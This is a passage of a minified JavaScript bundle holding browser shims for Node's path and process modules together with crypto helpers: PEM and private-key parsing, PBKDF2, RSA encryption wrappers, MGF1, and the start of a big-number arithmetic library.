ey("signatureValue").bitstr())});Pe.exports=y},5104:(Pe,we,de)=>{var ie=/Proc-Type: 4,ENCRYPTED[\n\r]+DEK-Info: AES-((?:128)|(?:192)|(?:256))-CBC,([0-9A-H]+)[\n\r]+([0-9A-z\n\r+/=]+)[\n\r]+/m,j=/^-----BEGIN ((?:.*? KEY)|CERTIFICATE)-----/m,$=/^-----BEGIN ((?:.*? KEY)|CERTIFICATE)-----([0-9A-z\n\r+/=]+)-----END \1-----$/m,ae=de(1851),I=de(8931),Q=de(265).Buffer;Pe.exports=function(F,E){var _,g=F.toString(),b=g.match(ie);if(b){var M="aes"+b[1],p=Q.from(b[2],"hex"),D=Q.from(b[3].replace(/[\r\n]/g,""),"base64"),w=ae(E,p.slice(0,8),parseInt(b[1],10)).key,x=[],S=I.createDecipheriv(M,w,p);x.push(S.update(D)),x.push(S.final()),_=Q.concat(x)}else{var y=g.match($);_=Q.from(y[2].replace(/[\r\n]/g,""),"base64")}return{tag:g.match(j)[1],data:_}}},3262:(Pe,we,de)=>{var ie=de(7934),j=de(2562),$=de(5104),ae=de(8931),I=de(8597),Q=de(265).Buffer;function F(g){var b;"object"==typeof g&&!Q.isBuffer(g)&&(b=g.passphrase,g=g.key),"string"==typeof g&&(g=Q.from(g));var p,D,_=$(g,b),y=_.tag,M=_.data;switch(y){case"CERTIFICATE":D=ie.certificate.decode(M,"der").tbsCertificate.subjectPublicKeyInfo;case"PUBLIC KEY":switch(D||(D=ie.PublicKey.decode(M,"der")),p=D.algorithm.algorithm.join(".")){case"1.2.840.113549.1.1.1":return ie.RSAPublicKey.decode(D.subjectPublicKey.data,"der");case"1.2.840.10045.2.1":return D.subjectPrivateKey=D.subjectPublicKey,{type:"ec",data:D};case"1.2.840.10040.4.1":return D.algorithm.params.pub_key=ie.DSAparam.decode(D.subjectPublicKey.data,"der"),{type:"dsa",data:D.algorithm.params};default:throw new Error("unknown key id "+p)}case"ENCRYPTED PRIVATE KEY":M=function E(g,b){var _=g.algorithm.decrypt.kde.kdeparams.salt,y=parseInt(g.algorithm.decrypt.kde.kdeparams.iters.toString(),10),M=j[g.algorithm.decrypt.cipher.algo.join(".")],p=g.algorithm.decrypt.cipher.iv,D=g.subjectPrivateKey,w=parseInt(M.split("-")[1],10)/8,x=I.pbkdf2Sync(b,_,y,w,"sha1"),S=ae.createDecipheriv(M,x,p),O=[];return O.push(S.update(D)),O.push(S.final()),Q.concat(O)}(M=ie.EncryptedPrivateKey.decode(M,"der"),b);case"PRIVATE KEY":switch(p=(D=ie.PrivateKey.decode(M,"der")).algorithm.algorithm.join(".")){case"1.2.840.113549.1.1.1":return ie.RSAPrivateKey.decode(D.subjectPrivateKey,"der");case"1.2.840.10045.2.1":return{curve:D.algorithm.curve,privateKey:ie.ECPrivateKey.decode(D.subjectPrivateKey,"der").privateKey};case"1.2.840.10040.4.1":return D.algorithm.params.priv_key=ie.DSAparam.decode(D.subjectPrivateKey,"der"),{type:"dsa",params:D.algorithm.params};default:throw new Error("unknown key id "+p)}case"RSA PUBLIC KEY":return ie.RSAPublicKey.decode(M,"der");case"RSA PRIVATE KEY":return ie.RSAPrivateKey.decode(M,"der");case"DSA PRIVATE KEY":return{type:"dsa",params:ie.DSAPrivateKey.decode(M,"der")};case"EC PRIVATE KEY":return{curve:(M=ie.ECPrivateKey.decode(M,"der")).parameters.value,privateKey:M.privateKey};default:throw new Error("unknown key type "+y)}}Pe.exports=F,F.signature=ie.signature},7313:(Pe,we,de)=>{"use strict";var ie=de(5486);function j(Q){if("string"!=typeof Q)throw new TypeError("Path must be a string. Received "+JSON.stringify(Q))}function $(Q,F){for(var y,E="",g=0,b=-1,_=0,M=0;M<=Q.length;++M){if(M<Q.length)y=Q.charCodeAt(M);else{if(47===y)break;y=47}if(47===y){if(b!==M-1&&1!==_)if(b!==M-1&&2===_){if(E.length<2||2!==g||46!==E.charCodeAt(E.length-1)||46!==E.charCodeAt(E.length-2))if(E.length>2){var p=E.lastIndexOf("/");if(p!==E.length-1){-1===p?(E="",g=0):g=(E=E.slice(0,p)).length-1-E.lastIndexOf("/"),b=M,_=0;continue}}else if(2===E.length||1===E.length){E="",g=0,b=M,_=0;continue}F&&(E.length>0?E+="/..":E="..",g=2)}else E.length>0?E+="/"+Q.slice(b+1,M):E=Q.slice(b+1,M),g=M-b-1;b=M,_=0}else 46===y&&-1!==_?++_:_=-1}return E}var I={resolve:function(){for(var g,F="",E=!1,b=arguments.length-1;b>=-1&&!E;b--){var _;b>=0?_=arguments[b]:(void 0===g&&(g=ie.cwd()),_=g),j(_),0!==_.length&&(F=_+"/"+F,E=47===_.charCodeAt(0))}return F=$(F,!E),E?F.length>0?"/"+F:"/":F.length>0?F:"."},normalize:function(F){if(j(F),0===F.length)return".";var E=47===F.charCodeAt(0),g=47===F.charCodeAt(F.length-1);return 0===(F=$(F,!E)).length&&!E&&(F="."),F.length>0&&g&&(F+="/"),E?"/"+F:F},isAbsolute:function(F){return j(F),F.length>0&&47===F.charCodeAt(0)},join:function(){if(0===arguments.length)return".";for(var F,E=0;E<arguments.length;++E){var g=arguments[E];j(g),g.length>0&&(void 0===F?F=g:F+="/"+g)}return void 0===F?".":I.normalize(F)},relative:function(F,E){if(j(F),j(E),F===E||(F=I.resolve(F))===(E=I.resolve(E)))return"";for(var g=1;g<F.length&&47===F.charCodeAt(g);++g);for(var b=F.length,_=b-g,y=1;y<E.length&&47===E.charCodeAt(y);++y);for(var p=E.length-y,D=_<p?_:p,w=-1,x=0;x<=D;++x){if(x===D){if(p>D){if(47===E.charCodeAt(y+x))return E.slice(y+x+1);if(0===x)return E.slice(y+x)}else _>D&&(47===F.charCodeAt(g+x)?w=x:0===x&&(w=0));break}var S=F.charCodeAt(g+x);if(S!==E.charCodeAt(y+x))break;47===S&&(w=x)}var U="";for(x=g+w+1;x<=b;++x)(x===b||47===F.charCodeAt(x))&&(U+=0===U.length?"..":"/..");return U.length>0?U+E.slice(y+w):(47===E.charCodeAt(y+=w)&&++y,E.slice(y))},_makeLong:function(F){return F},dirname:function(F){if(j(F),0===F.length)return".";for(var E=F.charCodeAt(0),g=47===E,b=-1,_=!0,y=F.length-1;y>=1;--y)if(47===(E=F.charCodeAt(y))){if(!_){b=y;break}}else _=!1;return-1===b?g?"/":".":g&&1===b?"//":F.slice(0,b)},basename:function(F,E){if(void 0!==E&&"string"!=typeof E)throw new TypeError('"ext" argument must be a string');j(F);var y,g=0,b=-1,_=!0;if(void 0!==E&&E.length>0&&E.length<=F.length){if(E.length===F.length&&E===F)return"";var M=E.length-1,p=-1;for(y=F.length-1;y>=0;--y){var D=F.charCodeAt(y);if(47===D){if(!_){g=y+1;break}}else-1===p&&(_=!1,p=y+1),M>=0&&(D===E.charCodeAt(M)?-1==--M&&(b=y):(M=-1,b=p))}return g===b?b=p:-1===b&&(b=F.length),F.slice(g,b)}for(y=F.length-1;y>=0;--y)if(47===F.charCodeAt(y)){if(!_){g=y+1;break}}else-1===b&&(_=!1,b=y+1);return-1===b?"":F.slice(g,b)},extname:function(F){j(F);for(var E=-1,g=0,b=-1,_=!0,y=0,M=F.length-1;M>=0;--M){var p=F.charCodeAt(M);if(47!==p)-1===b&&(_=!1,b=M+1),46===p?-1===E?E=M:1!==y&&(y=1):-1!==E&&(y=-1);else if(!_){g=M+1;break}}return-1===E||-1===b||0===y||1===y&&E===b-1&&E===g+1?"":F.slice(E,b)},format:function(F){if(null===F||"object"!=typeof F)throw new TypeError('The "pathObject" argument must be of type Object. Received type '+typeof F);return function ae(Q,F){var E=F.dir||F.root,g=F.base||(F.name||"")+(F.ext||"");return E?E===F.root?E+g:E+Q+g:g}("/",F)},parse:function(F){j(F);var E={root:"",dir:"",base:"",ext:"",name:""};if(0===F.length)return E;var _,g=F.charCodeAt(0),b=47===g;b?(E.root="/",_=1):_=0;for(var y=-1,M=0,p=-1,D=!0,w=F.length-1,x=0;w>=_;--w)if(47!==(g=F.charCodeAt(w)))-1===p&&(D=!1,p=w+1),46===g?-1===y?y=w:1!==x&&(x=1):-1!==y&&(x=-1);else if(!D){M=w+1;break}return-1===y||-1===p||0===x||1===x&&y===p-1&&y===M+1?-1!==p&&(E.base=E.name=F.slice(0===M&&b?1:M,p)):(0===M&&b?(E.name=F.slice(1,y),E.base=F.slice(1,p)):(E.name=F.slice(M,y),E.base=F.slice(M,p)),E.ext=F.slice(y,p)),M>0?E.dir=F.slice(0,M-1):b&&(E.dir="/"),E},sep:"/",delimiter:":",win32:null,posix:null};I.posix=I,Pe.exports=I},8597:(Pe,we,de)=>{we.pbkdf2=de(8266),we.pbkdf2Sync=de(2)},8266:(Pe,we,de)=>{var Q,_,ie=de(265).Buffer,j=de(9552),$=de(5616),ae=de(2),I=de(4964),F=global.crypto&&global.crypto.subtle,E={sha:"SHA-1","sha-1":"SHA-1",sha1:"SHA-1",sha256:"SHA-256","sha-256":"SHA-256",sha384:"SHA-384","sha-384":"SHA-384","sha-512":"SHA-512",sha512:"SHA-512"},g=[];function y(){return _||(_=global.process&&global.process.nextTick?global.process.nextTick:global.queueMicrotask?global.queueMicrotask:global.setImmediate?global.setImmediate:global.setTimeout)}function M(D,w,x,S,O){return F.importKey("raw",D,{name:"PBKDF2"},!1,["deriveBits"]).then(function(U){return F.deriveBits({name:"PBKDF2",salt:w,iterations:x,hash:{name:O}},U,S<<3)}).then(function(U){return ie.from(U)})}Pe.exports=function(D,w,x,S,O,U){"function"==typeof O&&(U=O,O=void 0);var K=E[(O=O||"sha1").toLowerCase()];if(K&&"function"==typeof global.Promise){if(j(x,S),D=I(D,$,"Password"),w=I(w,$,"Salt"),"function"!=typeof U)throw new Error("No callback provided to pbkdf2");!function p(D,w){D.then(function(x){y()(function(){w(null,x)})},function(x){y()(function(){w(x)})})}(function b(D){if(global.process&&!global.process.browser||!F||!F.importKey||!F.deriveBits)return Promise.resolve(!1);if(void 0!==g[D])return g[D];var w=M(Q=Q||ie.alloc(8),Q,10,128,D).then(function(){return!0}).catch(function(){return!1});return g[D]=w,w}(K).then(function(ee){return ee?M(D,w,x,S,K):ae(D,w,x,S,O)}),U)}else y()(function(){var ee;try{ee=ae(D,w,x,S,O)}catch(se){return U(se)}U(null,ee)})}},5616:(Pe,we,de)=>{var j,ie=de(5486);j=global.process&&global.process.browser?"utf-8":global.process&&global.process.version?parseInt(ie.version.split(".")[0].slice(1),10)>=6?"utf-8":"binary":"utf-8",Pe.exports=j},9552:Pe=>{var we=Math.pow(2,30)-1;Pe.exports=function(de,ie){if("number"!=typeof de)throw new TypeError("Iterations not a number");if(de<0)throw new TypeError("Bad iterations");if("number"!=typeof ie)throw new TypeError("Key length not a number");if(ie<0||ie>we||ie!=ie)throw new TypeError("Bad key length")}},2:(Pe,we,de)=>{var ie=de(6853),j=de(1447),$=de(6890),ae=de(265).Buffer,I=de(9552),Q=de(5616),F=de(4964),E=ae.alloc(128),g={md5:16,sha1:20,sha224:28,sha256:32,sha384:48,sha512:64,rmd160:20,ripemd160:20};function b(M,p,D){var w=function _(M){return"rmd160"===M||"ripemd160"===M?function D(w){return(new j).update(w).digest()}:"md5"===M?ie:function p(w){return $(M).update(w).digest()}}(M),x="sha512"===M||"sha384"===M?128:64;p.length>x?p=w(p):p.length<x&&(p=ae.concat([p,E],x));for(var S=ae.allocUnsafe(x+g[M]),O=ae.allocUnsafe(x+g[M]),U=0;U<x;U++)S[U]=54^p[U],O[U]=92^p[U];var K=ae.allocUnsafe(x+D+4);S.copy(K,0,0,x),this.ipad1=K,this.ipad2=S,this.opad=O,this.alg=M,this.blocksize=x,this.hash=w,this.size=g[M]}b.prototype.run=function(M,p){return M.copy(p,this.blocksize),this.hash(p).copy(this.opad,this.blocksize),this.hash(this.opad)},Pe.exports=function y(M,p,D,w,x){I(D,w);var S=new b(x=x||"sha1",M=F(M,Q,"Password"),(p=F(p,Q,"Salt")).length),O=ae.allocUnsafe(w),U=ae.allocUnsafe(p.length+4);p.copy(U,0,0,p.length);for(var K=0,ee=g[x],se=Math.ceil(w/ee),ve=1;ve<=se;ve++){U.writeUInt32BE(ve,p.length);for(var le=S.run(U,S.ipad1),ye=le,z=1;z<D;z++){ye=S.run(ye,S.ipad2);for(var l=0;l<ee;l++)le[l]^=ye[l]}le.copy(O,K),K+=ee}return O}},4964:(Pe,we,de)=>{var ie=de(265).Buffer;Pe.exports=function(j,$,ae){if(ie.isBuffer(j))return j;if("string"==typeof j)return ie.from(j,$);if(ArrayBuffer.isView(j))return ie.from(j.buffer);throw new TypeError(ae+" must be a string, a Buffer, a typed array or a DataView")}},5486:Pe=>{var de,ie,we=Pe.exports={};function j(){throw new Error("setTimeout has not been defined")}function $(){throw new Error("clearTimeout has not been defined")}function ae(p){if(de===setTimeout)return setTimeout(p,0);if((de===j||!de)&&setTimeout)return de=setTimeout,setTimeout(p,0);try{return de(p,0)}catch(D){try{return de.call(null,p,0)}catch(w){return de.call(this,p,0)}}}!function(){try{de="function"==typeof setTimeout?setTimeout:j}catch(p){de=j}try{ie="function"==typeof clearTimeout?clearTimeout:$}catch(p){ie=$}}();var E,Q=[],F=!1,g=-1;function b(){!F||!E||(F=!1,E.length?Q=E.concat(Q):g=-1,Q.length&&_())}function _(){if(!F){var p=ae(b);F=!0;for(var D=Q.length;D;){for(E=Q,Q=[];++g<D;)E&&E[g].run();g=-1,D=Q.length}E=null,F=!1,function I(p){if(ie===clearTimeout)return clearTimeout(p);if((ie===$||!ie)&&clearTimeout)return ie=clearTimeout,clearTimeout(p);try{ie(p)}catch(D){try{return ie.call(null,p)}catch(w){return ie.call(this,p)}}}(p)}}function y(p,D){this.fun=p,this.array=D}function M(){}we.nextTick=function(p){var D=new Array(arguments.length-1);if(arguments.length>1)for(var w=1;w<arguments.length;w++)D[w-1]=arguments[w];Q.push(new y(p,D)),1===Q.length&&!F&&ae(_)},y.prototype.run=function(){this.fun.apply(null,this.array)},we.title="browser",we.browser=!0,we.env={},we.argv=[],we.version="",we.versions={},we.on=M,we.addListener=M,we.once=M,we.off=M,we.removeListener=M,we.removeAllListeners=M,we.emit=M,we.prependListener=M,we.prependOnceListener=M,we.listeners=function(p){return[]},we.binding=function(p){throw new Error("process.binding is not supported")},we.cwd=function(){return"/"},we.chdir=function(p){throw new Error("process.chdir is not supported")},we.umask=function(){return 0}},8831:(Pe,we,de)=>{we.publicEncrypt=de(1599),we.privateDecrypt=de(8064),we.privateEncrypt=function(j,$){return we.publicEncrypt(j,$,!0)},we.publicDecrypt=function(j,$){return we.privateDecrypt(j,$,!0)}},7489:(Pe,we,de)=>{var ie=de(2161),j=de(265).Buffer;function $(ae){var I=j.allocUnsafe(4);return I.writeUInt32BE(ae,0),I}Pe.exports=function(ae,I){for(var E,Q=j.alloc(0),F=0;Q.length<I;)E=$(F++),Q=j.concat([Q,ie("sha1").update(ae).update(E).digest()]);return Q.slice(0,I)}},3355:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(7108).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,fa=0|P[2],Jt=8191&fa,Gt=fa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ua=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ua>>>26)|0,ua&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var 